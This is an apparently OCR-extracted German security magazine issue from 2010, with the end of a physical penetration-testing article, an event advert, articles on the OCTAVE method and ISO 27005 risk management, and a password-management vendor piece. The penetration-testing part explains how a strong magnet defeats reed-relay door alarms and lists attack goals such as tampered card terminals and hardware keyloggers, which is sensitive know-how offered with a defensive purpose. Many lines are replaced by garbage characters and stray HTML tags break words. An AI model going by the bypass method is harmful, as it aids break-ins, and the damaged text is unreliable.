Zwar halten sich die Hersteller solcher Geräte an die<br />
gesetzlichen Bestimmungen, ich würde allerdings immer<br />
auf eine zusätzliche Strahlenquelle verzichten, wo<br />
es geht.<br />
Eine weitere Alternative zu Bewegungsmeldern sind<br />
Kameras. Zwar halte ich persönlich nichts von Überwachung<br />
und ständiger Videoaufzeichnung, doch<br />
Kameras sind sehr gute Bewegungsmelder. Im Gegensatz<br />
zu den klassischen PIR, Ultraschall oder Radarbewegungsmeldern<br />
gibt es bei Kameras zahlreiche<br />
Bildpunkte, die ausgewertet werden können. Mit<br />
entsprechender Software kann man detektierte Bewegungen<br />
analysieren und z.B. mit einer Objekterkennung<br />
interpretieren. Verdächtige Bilder lassen sich an<br />
ein Sicherheitsunternehmen in Echtzeit übertragen,<br />
wo ein Mensch beurteilt, ob ein Alarm ausgelöst werden<br />
muss oder nicht.<br />
Reed-Relais<br />
Reed-Relais werden heute verwendet, um z.B. Tür-<br />
oder Fensteröffnungen zu detektieren. Ein Reed-Relais<br />
besteht einem Reed-Kontakt und einem Magneten.<br />
Der Reed-Kontakt wird am Rahmen befestigt und<br />
ist an die Einbruchmeldezentrale angeschlossen. Der<br />
Im Internet<br />
��� http://de.wikipedia.org/wiki/Lockpicking – Wikipedia Eintrag<br />
zum Thema Lockpicking<br />
��� http://www.evva.de����������������������������������������<br />
zylindern<br />
��� http://de.wikipedia.org/wiki/Reed-Relais – Wikipedia Eintrag<br />
zum Reed-Relais<br />
��� http://www.elv.de – Artikel-Nr. 68-835-10 – Radar Bewegungsmelder<br />
��� http://www.ettus.com/����������������������������������<br />
Penetration Testing im Jahre 2010<br />
Magnet wird auf dem beweglichen Element in Höhe<br />
des Kontaktes befestigt. Wirkt ein Magnetfeld auf den<br />
Reed-Kontakt, ziehen sich die Schaltkontakte gegenseitig<br />
an und ein Stromkreis wird geschlossen. Lässt<br />
das Magnetfeld nach, wenn z.B. eine Tür geöffnet wird<br />
und sich der Magnet dem Reed-Kontakt entfernt, wird<br />
der Stromkreis geöffnet. In diesem Fall wird dann der<br />
Alarm ausgelöst.<br />
Wie lassen sich Reed-Relais überlisten?<br />
Das ist vergleichbar einfach. Die Antwort auf diese Frage<br />
lautet natürlich: mit einem Magnetfeld. Hierfür eignen<br />
sich sogenannte „Todesmagneten“ (Abbildung 9.).<br />
Diese Permanentmagneten haben ein extrem starkes<br />
Magnetfeld. Unter Laborbedingungen hat ein Reed-<br />
Kontant bereits bei einer Entfernung von 40cm zum<br />
Magneten seine Schaltkontakte geschlossen. Holz-,<br />
Plastik- oder sogar Metall-Türen (sogar 2mm Stahl)<br />
bieten keine ausreichende Dämpfung für das Magnetfeld.<br />
Eine bessere Alternative zu Reed-Relais sind Licht-<br />
oder Laserschranken. Diese Schranken bringt man so<br />
an, dass die Tür den Strahl beim öffnen unterbrechen<br />
muss.<br />
Ziele eines solchen Angriffes<br />
Es sind viele Angriffsziele denkbar. Es kommt immer<br />
auf das Unternehmen an, dass angegriffen wird. Vor<br />
einigen Monaten berichtete die Presse über einen solchen<br />
Angriff auf einen Baumarkt. Kriminelle Einbrecher<br />
haben hier statt waren zu stehlen, die Elektronik<br />
der Karten-Termin<strong>als</strong> an den Kassen sabotiert, sodass<br />
diese die eingelesenen Daten von EC- und Kreditkarten<br />
samt der vom Kunden eingegebenen PIN per Funk<br />
übermittelt wurden. Auf dem Parkplatz des Baumarktes<br />
st<strong>and</strong> dann der Angreifer und hat die Daten empfangen.<br />
Ein <strong>and</strong>eres Angriffsziel könnte der Anschluss eines<br />
Mini-Computers am Netzwerk sein, der ein Loch durch<br />
die Firewall bohrt und dem Angreifer einen permanenten<br />
Zugriff auf das Netzwerk über das Internet gestattet.<br />
Auch ist die Installation eines Hardware-Keylogers<br />
denkbar, um die Zugangsdaten eines Mitarbeiters auszuspionieren.<br />
DIMITRI ROSCHKOWSKI<br />
Der Autor arbeitet bereits seit vielen Jahren <strong>als</strong> selbstständiger<br />
IT-Sicherheitsexperte und Consultant. Er führt außerdem<br />
bei Unternehmen Penetration Tests durch.<br />
Kontakt mit dem Autor: dimitri@roschkowski.biz<br />
hakin9.org/de 23
12-11-2010<br />
Die IT-Security Community Xchange ist DIE Weiterbildungsnacht für<br />
SystemadministratorInnen, Lehrbeauftragte, StudentInnen, Schüler-<br />
Innen, ExpertInnen und Geeks<br />
Themen:<br />
� Biometrie<br />
� Penetration Testing<br />
� Hackz und Crackz<br />
� Privacy<br />
� Forensische Analyse<br />
� Intrusion Prevention, Malwarededection<br />
� Rootkits und deren Erkennung<br />
Jetzt noch schnell<br />
anmelden unter:<br />
http://itsecx.fhstp.ac.at<br />
Die Teilnahme ist kostenlos!<br />
Freitag, 12. November 2010, 17 – 24 Uhr<br />
Fachhochschule St. Pölten<br />
Matthias Corvinus-Straße 15, 3100 St. Pölten<br />
T: +43/2742/313 228, E: office@fhstp.ac.at<br />
I: www.fhstp.ac.at
Um dies zielorientiert und auf die vorh<strong>and</strong>enen<br />
Business Needs maßzuschneidern sind Risikoerkennung<br />
(Risikoanalyse) und deren anschließende<br />
Bewertung (Business Impact Analyse) die ersten<br />
Schritte, die gemacht werden müssen.<br />
Eine effektive Informations-Sicherheitsbewertung betrachtet<br />
nicht nur den technologischen sondern auch<br />
den dahinter liegenden organisatorischen Aspekt. Beispielsweise<br />
die H<strong>and</strong>habung der IT-Infrastruktur durch<br />
die MitarbeiterInnen bei ihrer täglichen Arbeit. Durch ei-<br />
OCTAVE<br />
OCTAVE –Hier macht<br />
das Risiko die Musik<br />
Helmut Kaufmann<br />
Die überwiegende Mehrheit von Unternehmen sind nach regulativen<br />
Vorgaben wie z.B. Basel II, Solvency II, SOX, 8. EU Auditrichtlinie<br />
oder SAS 70 angehalten ein nachhaltiges und nachvollziehbares<br />
Risikomanagement und Business Continuity Planning zu<br />
implementieren.<br />
IN DIESEM ARTIKEL ERFAHREN SIE...<br />
��� ����������������������������������������������������������<br />
��������������������������������������������������������������<br />
ren.<br />
Abbildung 1. Risikomanagementzyklus<br />
WAS SIE VORHER WISSEN/KÖNNEN SOLLTEN...<br />
��� ���������������������������������������������������������<br />
men und St<strong>and</strong>ards.<br />
ne Risikoanalyse erhält man einen organisationsweiten<br />
Überblick über vorh<strong>and</strong>ene Risiken und ist somit integraler<br />
Best<strong>and</strong>teil des Risikomanagements (vergl. Abb.<br />
1).<br />
OCTAVE ist eine risikobasierende, strategische Sicherheitsbewertungs<br />
und -planungstechnik.<br />
OCTAVE® ist ein Kunstwort und setzt sich aus den<br />
Begriffen: Operationally Critical Threat, Asset, <strong>and</strong> Vulnerability<br />
Evaluation zusammen. Sie wurde von der<br />
Carnegie Mellon University, welche auch die populäre<br />
Abbildung 2. CIA<br />
hakin9.org/de 25
26<br />
Web-Site www.cert.org betreibt, passend für die unterschiedlichsten<br />
Unternehmensgrößen, <strong>als</strong> lizenzfreie<br />
Risikoanalyse Methode entwickelt.<br />
OCTAVE ist eine selbstgesteuerte Methode. Das bedeutet,<br />
dass die MitarbeiterInnen einer Organisation<br />
eine wesentliche Rolle bei der Erstellung der Sicherheitsstrategie<br />
übernehmen. Risiken von hoch kritisch<br />
erkannten Assets, werden dazu verwendet um eine<br />
entsprechende Priorisierung der Sicherheitsbereiche<br />
durchzuführen.<br />
Im Gegensatz zu typischen technologielastigen Bewertungsmethoden,<br />
die technologische Risiken und<br />
taktische Sachverhalte in den Mittelpunkt der Betrachtung<br />
stellen, ist OCTAVE auf organisatorische Risiken<br />
und deren dazu notwendigen Technologieeinsatz ausgerichtet.<br />
Sie ist eine äußerst flexible Methode, die für<br />
fast alle Organisationen speziell angepasst werden<br />
kann. Aus der Sichtweise des Autors ist einer der bemerkenswertesten<br />
Vorteile jedoch, dass die Methode<br />
von den MitarbeiterInnen selbst schnell erlernt und kontinuierlich<br />
durchgeführt werden kann und somit nachhaltig<br />
in den Risikomanagementprozess ohne weitere<br />
Kosten integrierbar ist.<br />
Ein ausgewähltes kleines Team aus allen operationellen<br />
Bereichen der Organisation inklusive der IT Abteilung<br />
arbeiten zusammen um die Sicherheitsbedürfnisse<br />
der Organisation zu identifizieren und versuchen<br />
die Gebiete: Operationelles Risiko, eingesetzte Sicher-<br />
Abbildung 3. Octave Phasen<br />
ABWEHR<br />
heitspraxis und Technologie ins Gleichgewicht zu setzten.<br />
Getrieben von zwei Grundaspekten – operationelles<br />
Risiko und aktuell eingesetzte Sicherheitspraktiken,<br />
wird die dahinter liegende Technologie in Zusammenhang<br />
mit der Sicherheitspraxis gegen die drei Eckpfeiler<br />
der Sicherheit geprüft (vergl. Abb 2.)<br />
OCTAVE ist ein wertegetriebener Bewertungsansatz.<br />
Das Analysis Team<br />
��� �������������� ��������������������� �������� ���� ����<br />
die Organisation wichtig sind.<br />
��� ����������� ���� ������������ ���� �������������� ����<br />
diejenigen Werte, die <strong>als</strong> besonders kritisch beurteilt<br />
werden Berücksichtigt die Zusammenhänge<br />
zwischen den kritischen Assets, den Bedrohungen<br />
und den Verwundbarkeiten<br />
��� ���������� �������� ��� ������ ��������������� ������<br />
menhang<br />
��� ����������� ����� ������������������ ����������������<br />
(organisatorisch und auch einen Plan zur Reduzierung<br />
der Risiken auf kritische Infrastrukturen)<br />
Daraus resultiert ein dreiphasiges Vorgehensmodell<br />
für die Erhebung des gesamtorganisatorischen<br />
Schutzbedürfnisses. (vergl. Abb. 3)<br />
��� ������� Aufbau von Asset-basierenden Bedro-<br />
��������������– Das Analyse Team stellt informati-<br />
10/2010
onsbezogene Assets und deren Impact auf die Organisation<br />
sowie deren derzeitige Schutzmechanismen<br />
fest. Darauf aufbauend werden die kritischsten<br />
������� ���������� ���� ���� �������������������������<br />
dafür bestimmt. Anschließend wird für jedes kri-<br />
������� ������ ���� ������������ �������������� ���� ����<br />
�����������������������������������������<br />
��� ������� Erkennen von Verwundbarkeiten der Infrastruktur<br />
– Hier wird die, hinter den kritischen Assets<br />
liegende, Infrastruktur bewertet. Dabei werden kritische<br />
Infrastrukturpfade und informationstechnologische<br />
Komponentenklassen aufgestellt und einer<br />
technischen Überprüfung – dem Penetration Test –<br />
����������� ���� ��������� ������� ����� ��� ���� ������<br />
tung direkt ein.<br />
��� ������� ����������� ������ ��������������������� ����<br />
������ ������������������ – In dieser Phase entscheidet<br />
das Analyse-Team wie mit den kritischen<br />
Assets umgegangen werden soll. Basierend auf die<br />
��������������������������������������������������<br />
organisationsweite Schutzstrategie und ein Plan für<br />
die Reduzierung der erkannten Risiken, die auf die<br />
kritischen Assets und deren Infrastrukturen einwirken<br />
können erstellt.<br />
Die einzelnen Prozesse, die den drei Phasen hinterlegt<br />
sind, stellen sicher, dass von allen Organisati-<br />
Abbildung 4. Octave und Risikomanagement<br />
OCTAVE<br />
onseinheiten und von allen hierarchischen Ebenen<br />
– <strong>als</strong>o von den MitarbeiterInnen über operationales<br />
und strategisches Management bis hin zum Management<br />
der ersten Ebene, alle Sichtweisen und<br />
die damit verbundenen Bewertungen der kritisch-<br />
����������������������������������������������������<br />
können.<br />
OCTAVE generiert so eine organisationsweite Sicht<br />
auf die aktuellen Informationssicherheitsrisiken.<br />
�����������������������������������������������������<br />
zen:<br />
��� ����������� ������ �������������� ������������������<br />
wie die erstellte Schutzstrategie und der Plan zur<br />
Risikoreduzierung umgesetzt werden kann.<br />
��� ��������������������� ���������� ���� ������������<br />
H<strong>and</strong>lungs-Planes.<br />
Überwachen/Beobachten des H<strong>and</strong>lungsplanes nach<br />
Effektivität. Das beinhaltet z.B. das Beobachten der<br />
Risiken für jede Änderung.<br />
��� ���������� ���� ������������� ������ ���������� ������<br />
ken.<br />
Die OCTAVE Methode ersetzt kein Risikomanagement<br />
sondern gehört in ein strukturiertes Risikomanage-<br />
hakin9.org/de 27
28<br />
Abbildung 5. Mapping auf ISO 27001<br />
ment eingebettet, welches nach einem ��������������<br />
act Zyklus arbeitet. (vergl. Abb 4)<br />
Die Organisation sollte in periodischen Abständen<br />
ihre ermittelte Baseline zurücksetzen indem eine<br />
nochmalige Risikoanalyse durchgeführt wird. Diese<br />
Zeitspanne kann vorgegeben werden oder von wichtigen<br />
Ereignissen wie z.B. eine Restrukturierungsmaßnahme<br />
der z.B. Netzwerkinfrastruktur u.v.m. angestoßen<br />
werden. Zwischen den Analysen kann die<br />
Organisation periodisch neue Risiken identifizieren,<br />
analysieren und in Relation zu bereits existierenden<br />
Risiken, Risiko reduzierende Maßnahmen entwickeln.<br />
Da die Risikoanalyse nur einen Teil des Risikomanagements<br />
darstellt ist die OCTAVE Methode mit ihrer<br />
offenen Schnittstelle hervorragend geeignet um <strong>als</strong><br />
„Best Practice“-Grundlage die ISO 27001 Norm zu im-<br />
Mehr Informationen:<br />
��� ��������www.cert.org/octave/<br />
��� �������www.isaca.org<br />
��� ���� ������� www.st<strong>and</strong>ards-online.net/InformationSecurity-<br />
St<strong>and</strong>ard.htm<br />
ABWEHR<br />
plementieren und in der Umsetzungsphase den COBIT<br />
4.0 St<strong>and</strong>ard zu verwenden.<br />
OCTAVE bildet die Grundlage der in der ISO 27001<br />
������������ ��������������� ������ ����������� ���� ���<br />
trachtungsbereiches, feststellen von kritischen Organisationswerten,<br />
qualitative und eventuell quantitative<br />
Betrachtung von Risiken, Entwicklung von entsprechenden<br />
Kontrollmaßnahmen um Risiken zu minimieren<br />
oder aber auch zu akzeptieren. Anschließend kann<br />
man unter Zuhilfenahme von COBIT die, der ISO Norm<br />
zugeschriebenen, Kontrollen implementieren. Man<br />
kann somit die IT Sicherheitsstrategie der betrachteten<br />
Organisation mit einer Risikoanalyse nach dem OCTA-<br />
VE Ansatz, und dem st<strong>and</strong>ardisierten Reifegrad-Modell<br />
nach COBIT - geprüft nach ISO 27001 - auswerten und<br />
umsetzen. (Verg. Abb. 5)<br />
MAG. HELMUT KAUFMANN, MSC<br />
Dozent an der Fachhochschule St. Pölten und u.a. tätig im Bereich<br />
Secure Data Center Management, Cloud Computing, Disaster<br />
Recovery <strong>and</strong> Business Continuity, Fraud Detection.<br />
10/2010
News<br />
Wetten, dass ... Ihr größtes<br />
Betriebsgeheimnis ungeschützt ist?<br />
Wie ein schlechter Sickerwitz, stellt man sich zuerst die Frage,<br />
was ist unser größtes Betriebsgeheimnis: Die Kundenlisten,<br />
die Projektdokumentationen und Strategiepapiere, die Zahlen<br />
auf den Bankkonten oder gar die private Telefonnummer vom<br />
Vorst<strong>and</strong>svorsitzenden? Schlussendlich sind es die Passwörter<br />
und Zugangsberechtigungen auf sämtliche Anwendungen und<br />
Datenbanken in jedem Unternehmen oder Organisation.<br />
Tausende Passwörter von Usern und<br />
Administratoren sind im Umlauf<br />
Man stelle sich komplexe IT L<strong>and</strong>schaften vor, die geografisch<br />
verteilt sind und viele Mitarbeiter, die in verschiedene<br />
„Rollen“ schlüpfen. Eine Buchhalterin hat nicht nur<br />
Zugang zu st<strong>and</strong>ardisierten Anwendungen, sondern auch<br />
zum Internetbanking, der FIBU Software und <strong>and</strong>eren<br />
kaufmännischen Programmen wie SAP. Interessant und<br />
zunehmend komplex wird es bei den IT Administratoren.<br />
Natürlich können sich diese, von vielen für ihre mathematischen<br />
Fähigkeiten bewunderten, auch nicht dutzende<br />
von Passwörtern merken, sondern helfen etwas nach: Pro<br />
Anwendung wird ein Passwort vergeben, das sich diese<br />
dann für längere Zeit im Gedächtnis behalten. Mit dieser<br />
Feststellung wird die gesamte Problematik sofort offenbar,<br />
ohne in technische Details gehen zu müssen: ein Passwort<br />
... für längere Zeit ... im Gedächtnis.<br />
Guter Rat ist teuer - und umsonst<br />
Richtlinien zur Passwortgestaltung gibt es unzählige und<br />
viele sind gut gemeint: Die Länge wird vorgegeben und<br />
auch die zu verwendenden Zeichen, die alle 4 Wochen<br />
zu ändern sind und natürlich nicht auf einem Post-It unter<br />
der Tastatur kleben sollen. Selbst wenn dies eingehalten<br />
wird, vergisst man sein neues Passwort spätestens,<br />
wenn man 2 Wochen auf Urlaub war und auch der Help-<br />
Desk freut sich, dass man wieder zurück ist. Auch der<br />
Auditor ist zumindest milde gestimmt, wenn die zentralen<br />
Passwörter zumindest in einer gesicherten Excel Liste<br />
zusammengefasst sind. Von IT Security sollte man aber<br />
dabei besser nicht sprechen, da jeder Administrator auf<br />
alle Passwörter zugreifen kann. Spätestens bei automatisierten<br />
(unattended) Passwörtern, die via Skript fixiert<br />
sind und auf eine Anwendung oder Datenbank zugreifen,<br />
sind verhaltensorientierte Ansätze obsolete.<br />
Passwortstruktur ist unbekannt<br />
Kaum ein IT Verantwortlicher hat verlässliche Informationen<br />
über die Strukturen und Verbreitungsgrade von<br />
Passwörtern in einer Organisation. Bei Implementie-<br />
rung eines automatisierten Passwort-Managements<br />
wird oft erst festgestellt, dass zehntausende privilegierte<br />
Administratorkonten vorh<strong>and</strong>en sind, aber nur 20%<br />
davon <strong>als</strong> Administratorkonten dienen. Der überwiegende<br />
Teil der Passwörter sind Application-to-Application<br />
(A2A) und Application-to-Database (A2D) Konten, die<br />
in Skripts den Zugriff ermöglichen. Und natürlich nur in<br />
seltensten Fällen geändert werden und somit immer eine<br />
Hintertüre, auch für den Ex-Mitarbeiter, offenlassen.<br />
Die Passwort Autorität: Freiwilligkeit und<br />
Empfehlungen sind nicht angebracht<br />
Die Zugangsberechtigungen sind <strong>als</strong> Schlüssel für Safes<br />
mit allen Geheimnissen der Organisation anzusehen.. Das<br />
Ergebnis einer Reflektion der Problematik „Passwörter“<br />
kann nur sein, dass ein automatisiertes und auditierbares<br />
Software-Werkzeug in Frage kommen kann. Die Durchsetzung<br />
der Passwörter Policies, Zuteilung von Einmal-Passwörtern<br />
und vor allem eine sichere Authentifizierung und<br />
Ablage dieser ist natürlich ebenso ein Must-Have. In Zeiten<br />
wie diesen, sollte es auf Knopfdruck möglich sein, einen Administrator<br />
zu sperren oder zeitlich begrenzte Passwörter<br />
für externe Dienstleister ausstellen zu können.<br />
Antares NetlogiX empfiehlt nach eingehender Analyse<br />
- des sehr überschaubaren Marktes - die Lösung<br />
„Cloakware Password Authority“. Die ersten erfolgreichen<br />
Referenzprojekte und Kundenmeinungen haben<br />
diese Meinung weiter verstärkt.<br />
hakin9.org/de 29
30<br />
ABWEHR<br />
IT-Risikomanagement<br />
– Wozu brauche ich das?<br />
Andreas Lentwojt<br />
In der letzten Ausgabe habe ich Ihnen ausführlich die Norm<br />
ISO/IEC 27001 vorgestellt und einen kurzen Einblick in die<br />
27000-Familie gegeben. Ein Teil dieser Familie ist die ISO 27005, die<br />
sich mit dem IT-Risikomanagement befasst.<br />
IN DIESEM ARTIKEL ERFAHREN SIE...<br />
��� �����������������������������������������������������<br />
��� �������������������<br />
��� ����������������������������������������������������<br />
In der heutigen Ausgabe werde ich Ihnen darstellen,<br />
warum es nützlich ist, sich mit dem Risikomanagement<br />
der IT zu beschäftigen und dabei auf das Modell<br />
der ISO 27005 zurück zu greifen.<br />
Auf dieses Thema wurde bereits in einer früheren<br />
Ausgabe eingegangen, in diesem Artikel wird aber<br />
mehr auf die Norm und den eigentlichen Prozess mit<br />
den einzelnen Schritten eingegangen.<br />
Abbildung 1. Aufbau eines Risikomanagementsystems (allgemein)<br />
WAS SIE VORHER WISSEN/KÖNNEN SOLLTEN...<br />
��� �������������������������������������������������������������<br />
men<br />
��� ������������������������������������������������������������<br />
IEC 27001)<br />
Größere Unternehmen sind schon von Gesetz her<br />
verpflichtet, sich mit dem Themenbereich Risikomanagement<br />
zu beschäftigen (Aktiengesetz, Kon-<br />
TraG, GmbH-Gesetz u.Ä.). Ein Teil dieses Risikomanagements<br />
ist das IT-Risikomanagement, welches<br />
sich – wie der Name es schon sagt – mit den Risiken<br />
im IT-Bereich beschäftigt. Eine Problematik beim<br />
Risikomanagement, allgemein und speziell bei der<br />
10/2010
Informationstechnologie, ist die Bewertung der erkannten<br />
Risiken. Bereits seit einigen Jahren gab es<br />
nationale Normen, die sich mit einem st<strong>and</strong>ardisierten<br />
Vorgehensmodell beschäftigten. Im Juni 2008<br />
wurde daraus die international anerkannte Norm<br />
ISO/IEC 27005:2008 (ehem. BS 7799-3:2006). ISO<br />
27005:2008 ist eine spezielle Ausprägung der ISO/IEC<br />
31000:2009, die sich mit dem Risikomanagement allgemein<br />
befasst. Die genauen Bezeichnungen lauten:<br />
��� ����������������������������������������������<br />
les <strong>and</strong> guidelines“<br />
��� �������������������������������������������������<br />
nagement“<br />
Warum überhaupt ein IT-Risikomanagementsystem im<br />
Unternehmens-Kontext?<br />
Datenverlust und -diebstahl gehören zu den größten<br />
Problemen in Unternehmen. Bisher bezog sich Risikomanagement<br />
in Unternehmen hauptsächlich auf Markt-<br />
und Adressrisiken sowie auf finanzielle Risikofaktoren.<br />
Das Risikomanagement im IT-Bereich wurde weitgehend<br />
vernachlässigt. Dabei lassen sich Sicherheitslücken mittels<br />
Risikomanagement aufdecken und minimieren, was<br />
auch Regressforderungen an die Unternehmensführung<br />
Abbildung 2. Aufbau der ISO 27005:2008<br />
IT-Risikomanagement – Wozu brauche ich das?<br />
entgegenwirkt. Richtlinien wie Basel II oder Euro-SOX<br />
fordern diese Ausrichtung seit langem.<br />
Die ISO 27005 ist branchen- und größenunabhängig.<br />
Somit können auch kleinere und mittlere Unternehmen<br />
durch die Adaption der Inhalte auf die betrieblichen Anforderungen<br />
ein schlankes und effektives IT-Risikomanagement<br />
aufbauen. Gerade sensible Branchen wie<br />
Automotive, Healthcare, Software oder Telekommunikation<br />
werden hier angesprochen. Aufgrund ähnlicher<br />
Strukturen lässt sich die ISO 27005 ohne größeren Aufw<strong>and</strong><br />
in ein unternehmensweites Risikomanagement<br />
integrieren, kann aber auch »solo« umgesetzt werden.<br />
Im Gegensatz zur ISO/IEC 27001 ist die ISO/IEC 27005<br />
selbst nicht zertifizierbar.<br />
Kapitel 1<br />
– Risikomanagementsystem allgemein<br />
Wie bei der ISO 27001 geht es auch bei der ISO 27005<br />
nicht um das „was“, sondern um das „wie“. Es ist ein<br />
Leitfaden zur Implementierung eines Risikoprozesses<br />
im Kontext der Informations- und Telekommunikationstechnologie.<br />
Wie sieht so ein Risikoprozess nun aus?<br />
Ganz allgemein betrachtet geht es wiederum um ein<br />
Managementsystem, welches aus 6 Schritten (vergl.<br />
Abb. 1) besteht:<br />
hakin9.org/de 31
32<br />
��� ���������������������������<br />
��� ����������������������������<br />
��� �������������<br />
��� ���������������������������������<br />
��� ��������������������������������<br />
��� ���������������������������������������<br />
Kapitel 2 – Der St<strong>and</strong>ard ISO/IEC 27005:2008<br />
Die ISO 27005 stellt eine Anleitung zur IT Risikoanalyse<br />
und zum Risikomanagement im IT Bereich dar. Sie<br />
beinhaltet dabei einerseits eine Beschreibung des kompletten<br />
Risikomanagementprozesses <strong>als</strong> Ganzes und<br />
<strong>and</strong>ererseits eine genaue Beschreibung der einzelnen<br />
Schritte des Risikomanagementprozesses und der Risikoanalyse.<br />
Die Anhänge der IEC 27005 liefern zudem<br />
nützliche Informationen zur Implementierung eines Risikomanagementsystems<br />
im Bereich Informationssi-<br />
�����������������������������������������������������<br />
Norm ISO 27001:<br />
��� �������������������������������������������������<br />
���������������������������������������������������<br />
��� ���� ��������������� ���� ��������� ������������� �����<br />
gen auf bedrohte Werte, direkte und indirekte Bedrohungen<br />
und Schwachstellen<br />
Abbildung 3. Der Sicherheitsprozess gem. ISO 27005:2008<br />
ABWEHR<br />
��� ������������������������������������������������<br />
schätzung der Risikowahrscheinlichkeit und des Risikoniveaus<br />
��� �����������������������������<br />
��� ���������������������������������������������������<br />
managementmaßnahmen<br />
����������������������������������������������������������<br />
Aus diesen einzelnen Kapiteln der Norm wird der IT-<br />
Sicherheitsprozess entwickelt (vergl. Abb. 3).<br />
Kapitel 3 – Die Phasen<br />
Defi nition der Rahmenbedingungen<br />
In einem ersten Schritt wird in einer Schutzbedarfsfeststellung<br />
(High Level Risk Analysis) der Schutzbedarf für<br />
�������������������������������������������������������<br />
Schutzbedarfskategorie "niedrig bis hoch" wird i.d.R. auf<br />
eine detaillierte Risikoanalyse verzichtet. Dies erlaubt eine<br />
schnelle und effektive Auswahl von grundlegenden<br />
Sicherheitsmaßnahmen bei gleichzeitiger Gewährleistung<br />
eines angemessenen Schutzniveaus. IT-Systeme<br />
der Schutzbedarfskategorie „sehr hoch" sind einer detaillierten<br />
Risikoanalyse zu unterziehen, auf deren Basis<br />
individuelle Sicherheitsmaßnahmen ausgewählt werden.<br />
10/2010
Diese Option kombiniert die Vorteile des Grundschutz-<br />
und des Risikoanalyseansatzes, da alle IT-<br />
Systeme mit hohem Schutzbedarf wirksam und angemessen<br />
geschützt werden. Maßnahmen können für die<br />
<strong>and</strong>eren Systeme mit Hilfe des Grundschutzes schnell<br />
und effektiv ausgewählt werden. Diese Methode stellt in<br />
den meisten Einsatzumgebungen eine empfehlenswerte<br />
Strategie zur Risikoanalyse dar.<br />
Zu den einzelnen Kriterien, die festgelegt werden<br />
müssen gehören u.a.<br />
��� �������������������������������<br />
��� ���������������������������������<br />
��� �������������������������<br />
��� �������������������������������������<br />
Risikobewertung<br />
Die Risikobewertung gliedert sich in die beiden Vorgänge<br />
Risikoanalyse und der Priorisierung der Risiken.<br />
Die Risikoanalyse ist sicherlich der schwierigste und<br />
aufwendigste Teil, müssen doch zunächst die Risiken<br />
������������������������������������������������������sets“<br />
des Unternehmens wird folgender Prozess durchlaufen:<br />
��� �������������������<br />
��� ��������������<br />
��� �������������������������������<br />
��� ���������������������<br />
��� ����������������������<br />
Dieser Prozess wird für alle Assets wiederholt. Ein Asset<br />
im Sinne der ISO 27005 ist alles, was einen Wert<br />
für die Organisation besitzt und daher schützenswert<br />
����������������������������������������������������������<br />
Rahmenbedingungen den zu betrachtenden Rahmen<br />
zunächst eng zu fassen. Er kann später immer noch<br />
erweitert werden. Die Norm unterteilt hierbei in primäre<br />
Assets (Geschäftsprozesse und –aktivitäten, Informationen)<br />
und unterstützende Assets (Hard- und Software,<br />
Netzwerk, Personal, Infrastruktur, etc.). Eine de-<br />
����������� ������������ �������� ����� ��� ������� �� ����<br />
Norm.<br />
Aus dem beschriebenen Prozess erfolgt eine Analyse<br />
und Auflistung der Konsequenzen und letztendlich eine<br />
Risikoeinschätzung.<br />
��������������������������������������������������-<br />
�������������������������������������������������wertung<br />
nach Zeitwert, nach Wiederbeschaffungswert,<br />
nach dem Wert für einen potenziellen Angreifer oder<br />
nach dem Schaden für die Organisation aus einem Verlust<br />
des Assets. Immaterielle Werte werden i.d.R. nach<br />
dem Wert für einen potenziellen Angreifer oder nach dem<br />
Schaden für die Organisation aus einem Verlust des Assets<br />
bewertet. Bei der Bewertung ist zu beachten, dass<br />
Wertekombinationen häufig nicht der Summe der Einzel-<br />
IT-Risikomanagement – Wozu brauche ich das?<br />
werte entsprechen, da sich die Werte in Kombination ergänzen<br />
und einen höheren Wert darstellen.<br />
Die zu schützenden Werte sind vielfältigen Bedrohungen<br />
ausgesetzt. Im Rahmen der Risikoanalyse<br />
ist nun die Eintrittswahrscheinlichkeit abzuschätzen.<br />
Bedrohungen sind charakterisiert durch:<br />
��� ������������������������������<br />
��� �����������������������������������������������vorteile,<br />
Rache)<br />
��� ����������������������������<br />
��� ���� ������ ���� ���������� ���� ������ ������ �����hung<br />
verursacht werden kann.<br />
�������������������������������������������������ben,<br />
Blitzschlag, ...) liegen statistische Daten vor, die<br />
für die Einschätzung hilfreich sein können.<br />
Die Bedrohungsanalyse umfasst im Einzelnen:<br />
��� ���������������������������������������<br />
��� ������������������������������������������������<br />
Bedrohungen können unterteilt werden in:<br />
��� ������������������������������������������������sonalausfall)<br />
��� ����������������� ������� ���������� ����� �������chende<br />
Dokumentation)<br />
��� ������������ ��������������� ������������� ������nutzung<br />
oder -administration, Nichtbeachtung von<br />
Sicherheitsmaßnahmen)<br />
��� ������������������������������������������������tenträger)<br />
��� ������������� ����������� �������������������������<br />
von Geräten, Manipulation an Daten oder Software,<br />
Viren, trojanische Pferde)<br />
Es ist wichtig, alle wesentlichen Bedrohungen zu erfassen,<br />
da <strong>and</strong>ernfalls Sicherheitslücken bestehen<br />
bleiben können. Im Anhang C der Norm ist eine umfangreiche<br />
Listung von Bedrohungen vorh<strong>and</strong>en, jedoch<br />
kann keine derartige Liste vollständig sein. Darüber<br />
hinaus sind auch Bedrohungen einem ständigen<br />
W<strong>and</strong>el und einer ständigen Weiterentwicklung unterworfen.<br />
Nachdem Werte und Bedrohungen erfasst wurden,<br />
muss nun die Eintrittswahrscheinlichkeit zugeordnet<br />
werden. Es ist <strong>als</strong>o zu bestimmen, mit welcher Wahrscheinlichkeit<br />
eine Bedrohung im betrachteten Umfeld<br />
eintreten wird.<br />
Auch die Eintrittswahrscheinlichkeit kann quantitativ<br />
oder qualitativ bewertet werden. Da eine quantita-<br />
����� ���������� ��� ������� ������� ����� ������������ ���täuschen<br />
könnte, ist in den letzten Jahren ein Trend in<br />
Richtung qualitativer Bewertung zu erkennen.<br />
hakin9.org/de 33
34<br />
Bewährt haben sich hier etwa drei- bis fünfteilige Skalen<br />
(z.B. 4: sehr häufig … 0: sehr selten)<br />
Diese allgemeinen Bedeutungen der Skalenwerte<br />
können für jeden einzelnen spezifischen Anwendungsbereich<br />
konkretisiert werden.<br />
Nachdem Werte, Bedrohungen und Eintrittswahrscheinlichkeiten<br />
definiert sind, wird eine Schwachstellenanalyse<br />
durchgeführt. Unter einer Schwachstelle (Vulnerability)<br />
versteht man eine Sicherheitsschwäche eines<br />
oder mehrerer Objekte, die durch eine Bedrohung ausgenützt<br />
werden kann. Eine Schwachstelle selbst verursacht<br />
noch keinen Schaden, sie ist aber die Voraussetzung,<br />
die es einer Bedrohung ermöglicht, wirksam zu werden.<br />
Typische Beispiele für Schwachstellen sind etwa:<br />
